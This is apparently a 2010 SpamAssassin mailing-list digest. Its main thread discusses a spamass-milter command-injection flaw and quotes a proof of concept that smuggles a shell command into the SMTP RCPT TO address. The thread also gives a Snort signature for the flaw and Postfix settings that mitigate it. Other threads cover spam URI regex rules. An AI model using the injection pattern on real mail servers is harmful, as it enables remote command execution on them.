  If spamass-milter is run with the expand flag (-x option) it runs a
  popen() including the attacker supplied 
  recipient (RCPT TO).
  
  POC IS
  
  $ nc localhost 25
  220 ownthabox ESMTP Postfix (Ubuntu)
  mail from: me () me com
  250 2.1.0 Ok
  rcpt to: root+:|touch /tmp/foo
  250 2.1.5 Ok
  
  $ ls -la /tmp/foo
  -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
  
  
 
 Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
 
 mail from: n...@example.com
 250 2.1.0 Ok
 rcpt to: root+:|touch /tmp/foo
 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need 
 fully-qualified address
 quit
 221 2.0.0 Bye
 Connection closed by foreign host.
 
That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)

It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}



Re: Spanish/Brazilian/Mexican spam

2010-03-08 Thread Martin Gregorie
On Mon, 2010-03-08 at 14:56 -0500, Charles Gregory wrote:
 Can anyone take a look at this crud and see a header or flag/type that I 
 could score in SA?
 
I can't see anything immediately apart from the rather wackamoleish
track of scoring the hidden URL in the body.

If this trick:
<a href="http://www.spammer.com">www.niceguy.com/wellknown/outfit</a>

is at all common, there may be a case for writing a plugin that can
detect the difference between URL and visible text. I haven't noticed
them differing in the ham I receive, but ymmv.


Martin




Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
 That's Postfix 2.3.3 on RHEL5 BTW :-)
 
 $ rpm -q postfix
 postfix-2.3.3-2.1.el5_2.x86_64
 
Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
time without using the milter or something hideous like
Amavis-crashalot? Perhaps if they added some features to that old
dinosaur it would become a bit more useful as an MTA :-)



Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Ned Slider

Brian wrote:

On Mon, 2010-03-08 at 20:16 +, Ned Slider wrote:

Brian wrote:

On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
just a heads up:  I don't know if there is a problem with SA milter, but 
there is a snort signature for it now.



 Original Message 
Subject: 	[Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

Date:   Mon, 8 Mar 2010 13:03:52 +
From:   Kevin Ross kevros...@googlemail.com
To: 	emerging-s...@emergingthreats.net 
emerging-s...@emergingthreats.net, Matt Jonkman jonk...@jonkmans.com




alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
flow:established,to_server; content:"to|3A|"; nocase; 
content:"root+|3A|\|7C|"; nocase; within:15; classtype:attempted-user; 
reference:url,www.securityfocus.com/bid/38578; 
reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)


Kev


The key is this:

If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO).


POC IS

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo



Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses

mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need 
fully-qualified address

quit
221 2.0.0 Bye
Connection closed by foreign host.


That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)

It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}




If I've understood the disclosure and PoC correctly, in order to 
*remotely* exploit spamass-milter, you need to pass it malformed 
recipient (RCPT TO) data from the MTA (as the MTA is your remotely 
visible attack surface). If the MTA is RFC compliant and not accepting 
clearly malformed non-FQDN recipient addresses then I fail to see how 
you can remotely exploit spamass-milter, at least through the MTA.





Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Ned Slider

Brian wrote:

That's Postfix 2.3.3 on RHEL5 BTW :-)

$ rpm -q postfix
postfix-2.3.3-2.1.el5_2.x86_64


Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
time without using the milter or something hideous like
Amavis-crashalot? Perhaps if they added some features to that old
dinosaur it would become a bit more useful as an MTA :-)




See this guide I've written:

http://wiki.centos.org/HowTos/postfix_restrictions

Specifically,

# /etc/postfix/main.cf
# Recipient restrictions:
smtpd_recipient_restrictions =
    reject_unknown_recipient_domain



Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Ned Slider

Ned Slider wrote:

Brian wrote:

That's Postfix 2.3.3 on RHEL5 BTW :-)

$ rpm -q postfix
postfix-2.3.3-2.1.el5_2.x86_64


Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
time without using the milter or something hideous like
Amavis-crashalot? Perhaps if they added some features to that old
dinosaur it would become a bit more useful as an MTA :-)




See this guide I've written:

http://wiki.centos.org/HowTos/postfix_restrictions

Specifically,

# /etc/postfix/main.cf
# Recipient restrictions:
smtpd_recipient_restrictions =
    reject_unknown_recipient_domain




Sorry, of course I meant:

smtpd_recipient_restrictions =
reject_non_fqdn_recipient
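The effect of reject_non_fqdn_recipient on the recipients seen in this thread, as an added Python model (not Postfix source, and simplified: Postfix's real address rewriting is not reproduced), with one extra check of the example's own: a dot-atom test on the local part. That check is not a Postfix restriction and only matters for software that hands the local part to a shell; the thread's answer to that remains not running spamass-milter with -x.

```python
"""Model of Postfix's reject_non_fqdn_recipient on this thread's recipients,
plus a local-part check that is this example's own addition (added example;
not Postfix source)."""
import re
from typing import Optional, Tuple

# One DNS label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# RFC 5321 dot-atom local part: atext characters separated by single dots.
# Note that | is legal atext; ':' and ' ' are not, which is what trips the PoC.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
DOT_ATOM = re.compile(rf"^{ATEXT}(?:\.{ATEXT})*$")


def split_address(rcpt: str) -> Optional[Tuple[str, str]]:
    """'<user@example.com>' or 'user@example.com' -> ('user', 'example.com');
    None when there is no @ at all."""
    addr = rcpt.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    local, at, domain = addr.rpartition("@")
    return (local, domain) if at else None


def is_fqdn(domain: str) -> bool:
    """Fully-qualified form: at least two valid labels. Purely syntactic; the
    other restriction mentioned in the thread, reject_unknown_recipient_domain,
    instead asks DNS whether the domain exists, so it is not modelled here."""
    labels = domain.rstrip(".").split(".")
    return len(labels) >= 2 and all(LABEL.match(label) for label in labels)


def non_fqdn_recipient_verdict(rcpt: str) -> Tuple[int, str]:
    """The reply an smtpd with reject_non_fqdn_recipient gives (same text
    Ned's Postfix 2.3.3 returned in the thread)."""
    parts = split_address(rcpt)
    if parts is None or not is_fqdn(parts[1]):
        return 504, (f"5.5.2 <{rcpt.strip()}>: Recipient address rejected: "
                     "need fully-qualified address")
    return 250, "2.1.5 Ok"


def local_part_ok(rcpt: str) -> bool:
    """Defence in depth for anything that hands the local part to a shell:
    accept only an RFC 5321 dot-atom. This is the example's own check, not a
    Postfix feature, and plus-addressing (user+tag) still passes it."""
    parts = split_address(rcpt)
    local = parts[0] if parts else rcpt.strip().strip("<>")
    return DOT_ATOM.match(local) is not None


if __name__ == "__main__":
    for r in ["root+:|touch /tmp/foo", "<user+tag@example.com>", "<root@localhost>"]:
        code, text = non_fqdn_recipient_verdict(r)
        print(f"{code} {text}   local part is dot-atom: {local_part_ok(r)}")
```

The model shows why Ned's restriction stops the PoC as posted: the recipient has no domain at all, so it never reaches a milter. It also shows what the restriction does not look at, which is the local part; that is the part spamass-milter -x hands to popen(), and it is why Brian's answer (do not use -x) is the fix rather than a workaround.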



Re: Spanish/Brazilian/Mexican spam

2010-03-08 Thread Bowie Bailey
Martin Gregorie wrote:
 On Mon, 2010-03-08 at 14:56 -0500, Charles Gregory wrote:
   
 Can anyone take a look at this crud and see a header or flag/type that I 
 could score in SA?

 
 I can't see anything immediately apart from the rather wackamoleish
 track of scoring the hidden URL in the body.

 If this trick:
 <a href="http://www.spammer.com">www.niceguy.com/wellknown/outfit</a>

 is at all common, there may be a case for writing a plugin that can
 detect the difference between URL and visible text. I haven't noticed
 them differing in the ham I receive, but ymmv.

Unfortunately, they frequently differ in ham.  Usually due to someone
wanting a clear URL visible to the user, but they want to have a
tracking URL (frequently going to a 3rd party) when the user clicks the
link.

This is something that gets brought up here from time to time and while
it sounds logical, it doesn't work.

-- 
Bowie
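Martin's proposed check and Bowie's objection to it, as an added Python example (not a SpamAssassin plugin and not the thread's code): collect every anchor in the body, and flag links whose visible text names a host other than the one the href actually points at. The three messages are constructed; the newsletter one has the tracking-link layout Bowie describes and is flagged exactly like the spam, which is the false positive the thread is talking about.

```python
"""The "href differs from visible text" check, run over constructed spam and
ham so the false positive is visible (added example; not an SA plugin)."""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Visible text a reader would take for an address: optional scheme and www.,
# then a dotted hostname, optionally followed by a path.
HOSTLIKE = re.compile(
    r"^(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})(?:/\S*)?$", re.I)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a href=...> in the body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host: str) -> str:
    """Lower-case and drop a leading www. so www.example.com == example.com."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def href_host(href: str) -> str:
    return registrable(urlsplit(href).hostname or "")


def visible_host(text: str) -> Optional[str]:
    """The host named by the link text, or None if the text is not URL-like."""
    m = HOSTLIKE.match(text)
    return registrable(m.group(1)) if m else None


def mismatched_links(html: str) -> List[Tuple[str, str]]:
    """(real host, displayed host) for each link whose text names another host."""
    parser = AnchorCollector()
    parser.feed(html)
    out = []
    for href, text in parser.links:
        shown = visible_host(text)
        if shown and shown != href_host(href):
            out.append((href_host(href), shown))
    return out


# Constructed messages.
SPAM = '<p>Offer: <a href="http://www.spammer.com">www.niceguy.com/wellknown/outfit</a></p>'
HAM_NEWSLETTER = ('<p>Read more at <a href="http://click.tracker.example/r?u=12345">'
                  'www.example.com/product</a> or <a href="https://example.com/x">click here</a></p>')
HAM_PLAIN = '<p><a href="https://www.example.com/docs">www.example.com/docs</a></p>'

if __name__ == "__main__":
    for name, body in [("spam", SPAM), ("ham newsletter", HAM_NEWSLETTER), ("ham plain", HAM_PLAIN)]:
        print(f"{name}: {mismatched_links(body)}")
```

Restricting the check to link text that looks like an address (so "click here" is ignored) removes the obvious noise, but the newsletter case shows why it still cannot carry a meaningful score on its own: legitimate mail routinely shows one host and links through another.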


Re: Spanish/Brazilian/Mexican spam

2010-03-08 Thread Martin Gregorie
On Mon, 2010-03-08 at 15:49 -0500, Bowie Bailey wrote:
 Martin Gregorie wrote:
  On Mon, 2010-03-08 at 14:56 -0500, Charles Gregory wrote:

  Can anyone take a look at this crud and see a header or flag/type that I 
  could score in SA?
 
  
  I can't see anything immediately apart from the rather wackamoleish
  track of scoring the hidden URL in the body.
 
  If this trick:
  <a href="http://www.spammer.com">www.niceguy.com/wellknown/outfit</a>
 
  is at all common, there may be a case for writing a plugin that can
  detect the difference between URL and visible text. I haven't noticed
  them differing in the ham I receive, but ymmv.
 
 Unfortunately, they frequently differ in ham.  Usually due to someone
 wanting a clear URL visible to the user, but they want to have a
 tracking URL (frequently going to a 3rd party) when the user clicks the
 link.
 
 This is something that gets brought up here from time to time and while
 it sounds logical, it doesn't work.
 
OK, thanks: idea filed in the NBG bin.


Martin




Re: rules

2010-03-08 Thread Jari Fredriksson
On 8.3.2010 21:33, Renata Dias wrote:
  
 Some messages receive score 0.00/0.00 and other receive the correct
 score like the example below.
  
...
 I've updated SpamAssassin to p5-Mail-SpamAssassin-3.3.0_3 and the rules are in
 /var/db/spamassassin/3.003000/ .
  
 Can someone help me?
 

You showed proof that some rules have a correct score. You also
said that some rules show a zero score, but did not post any evidence.

Indeed, some rules are scored as zero, but you are free to change the
score in your local.cf or other local configuration file. It is possible
that the results of those rules were uncertain in the mass tests of the
developers, so the score was left at 0.

But we do not know. You only posted the rules behaving well.

-- 
http://www.iki.fi/jarif/

Q:  What is purple and concord the world?
A:  Alexander the Grape.





Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)

2010-03-08 Thread John Hardin

On Mon, 8 Mar 2010, Ned Slider wrote:


Adam Katz wrote:

   On 15-May-2009, at 12:46, Adam Katz wrote:
uri URI_HIDDEN /.{7}\/\../

 LuKreme wrote:
   That won't catch
   http://www.spammer.example.com/.../hidden-malware.asf, it will only
   catch the relative url form ../path/to/content which SA improperly
   prefaces with "http://".
  
   uri URI_HIDDEN /.{8}\/\../


 Works for me:

 $ echo http://www.spammer.example.com/.../hidden-malware.asf |perl -ne
 '$_ = "http://$_" unless m{^[a-z]+://}; print "hits\n" if /.{8}\/\../'
 hits
 $
 $ echo 'href=../not/a/hidden/directory' |perl -ne '$_ = "http://$_"
 unless m{^[a-z]+://}; print "hits\n" if /.{8}\/\../'
 $



For some time now I've been running

uri LOCAL_URI_HIDDEN_DIR /.{8}\/\../

as discussed above and it works extremely well with few FPs.

However, today I did notice a FP on this type of URI with multiple relative 
paths:


../../../../blah

So I've refined the rule to specifically exclude hitting on the sequence ../. 
which stops the rule triggering on multiple relative paths.


uri LOCAL_URI_HIDDEN_DIR /(?!.{6}\.\.\/\..).{8}\/\../


How about:

uri LOCAL_URI_HIDDEN_DIR m;.{8}/\..(?!/);

--
 John Hardin KA7OHZ                    http://www.impsec.org/~jhardin/
 jhar...@impsec.org    FALaholic #11174    pgpk -a jhar...@impsec.org
 key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
---
  Failure to plan ahead on someone else's part does not constitute
  an emergency on my part. -- David W. Barts in a.s.r
---
 6 days until Daylight Saving Time begins in U.S. - Spring Forward

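As an added example (not the list's or SpamAssassin's own code), the three rule bodies above as Python regexes, applied after the http:// prefixing the thread describes, over constructed URIs; the host names are hypothetical and the absolute-URL multi-../ sample goes beyond the thread's own test cases to show where the refined lookahead rule still fires.

```python
import re

# The rule bodies discussed in the thread; Perl and Python regex syntax
# coincide for these patterns, so they are used verbatim.
RULES = {
    "adam": r".{8}\/\..",                    # uri URI_HIDDEN
    "ned":  r"(?!.{6}\.\.\/\..).{8}\/\..",   # LOCAL_URI_HIDDEN_DIR, refined
    "john": r".{8}/\..(?!/)",                # John's m;...; variant
}

def sa_prefix(uri):
    """Mimic the behaviour the thread describes: a scheme-less (relative)
    URI is prefaced with http:// before uri rules see it."""
    return uri if re.match(r"[a-z]+://", uri) else "http://" + uri

def hits(uri):
    """Map rule name -> True if that rule fires on the (prefixed) URI."""
    target = sa_prefix(uri)
    return {name: re.search(pat, target) is not None
            for name, pat in RULES.items()}

# Constructed sample URIs (hypothetical hosts) with the verdict a human
# would want: True = hidden dot-directory, False = benign.
SAMPLES = [
    ("http://www.spammer.example.com/.../hidden-malware.asf", True),
    ("../not/a/hidden/directory", False),
    ("../../../../blah", False),                          # Ned's reported FP
    ("http://www.example.com/../../../../blah", False),   # beyond the thread
    ("http://www.example.com/index.html", False),
]

def false_positives(rule):
    """Benign sample URIs on which `rule` fires."""
    return [u for u, hidden in SAMPLES if not hidden and hits(u)[rule]]

def false_negatives(rule):
    """Hidden-directory sample URIs that `rule` misses."""
    return [u for u, hidden in SAMPLES if hidden and not hits(u)[rule]]

if __name__ == "__main__":
    for rule in RULES:
        print(f"{rule:5s} FP={false_positives(rule)} "
              f"FN={false_negatives(rule)}")
```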

Re: rules

2010-03-08 Thread Kai Schaetzl
Renata Dias wrote on Mon, 8 Mar 2010 16:33:15 -0300:

 Some messages receive score 0.00/0.00 and other receive the correct score
 like the example below.

First: there's no evidence that these messages *should* score anything. 
Save them to a file and pipe them thru SA to see what they should score.
Second: you are using simscan which seems to be something qmail-related, so 
rather look there for a cause. For instance, have you checked that it is 
compatible with SA 3.3.0?
Third: there are usually size limits for scanning.

Kai

-- 
Get your web at Conactive Internet Services: http://www.conactive.com





Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)

2010-03-08 Thread Ned Slider

John Hardin wrote:

On Mon, 8 Mar 2010, Ned Slider wrote:


So I've refined the rule to specifically exclude hitting on the 
sequence ../. which stops the rule triggering on multiple relative paths.


uri LOCAL_URI_HIDDEN_DIR /(?!.{6}\.\.\/\..).{8}\/\../


How about:

uri LOCAL_URI_HIDDEN_DIR m;.{8}/\..(?!/);



Yes, that works too on my examples and is probably a more elegant 
solution than mine :-)


John - are you able to try this rule in your sandbox and do mass checks? 
I'd be interested to see how it scores.




Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)

2010-03-08 Thread John Hardin

On Mon, 8 Mar 2010, Ned Slider wrote:


John Hardin wrote:

 On Mon, 8 Mar 2010, Ned Slider wrote:
 
  So I've refined the rule to specifically exclude hitting on the sequence 
  ../. which stops the rule triggering on multiple relative paths.
 
   uri LOCAL_URI_HIDDEN_DIR /(?!.{6}\.\.\/\..).{8}\/\../


 How about:

  uri LOCAL_URI_HIDDEN_DIR m;.{8}/\..(?!/);



Yes, that works too on my examples and is probably a more elegant solution 
than mine :-)


John - are you able to try this rule in your sandbox and do mass checks? I'd 
be interested to see how it scores.


I'll add it.

--
 John Hardin KA7OHZ                    http://www.impsec.org/~jhardin/
 jhar...@impsec.org    FALaholic #11174    pgpk -a jhar...@impsec.org
 key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
---
  Failure to plan ahead on someone else's part does not constitute
  an emergency on my part. -- David W. Barts in a.s.r
---
 6 days until Daylight Saving Time begins in U.S. - Spring Forward


Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 20:44 +, Ned Slider wrote:
 Brian wrote:
  That's Postfix 2.3.3 on RHEL5 BTW :-)
 
  $ rpm -q postfix
  postfix-2.3.3-2.1.el5_2.x86_64
 
  Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
  time without using a milter or something hideous like
  Amavis-crashalot? Perhaps if they added some features to that old
  dinosaur it would become a bit more useful as an MTA :-)
  
  
 
 See this guide I've written:
 
 http://wiki.centos.org/HowTos/postfix_restrictions
 
 Specifically,
 
 # /etc/postfix/main.cf
 # Recipient restrictions:
 smtpd_recipient_restrictions =
 reject_unknown_recipient_domain
 
Yes, but that does not answer my question {and is once more Postfix
biased}. AFAIK Postfix is totally unable to reject mail at SMTP time that
Spamassassin decides IS SPAM without the aid of a milter or policy
daemon of some kind. Unless you know different? 

Natively it can happily do it after accepting the mail (hint - a bit
late then...) with an after-queue filter, but this is prone to the
phenomenon that is 'Postscatter' - sending the message back to the
(often) forged sender. This is kind of ironic given how the Postfix
Posse bang on about 'not accepting' mail of criteria 'x'.

Postfix, much as I love it, has some gaping holes in its feature set.
It really is an MTA for the 1990s. The need to bolt in a Sendmail
Milter to get it to reject Spamassassin-tagged mail at the SMTP stage is
a glaring example IMHO - but all this is very much OT.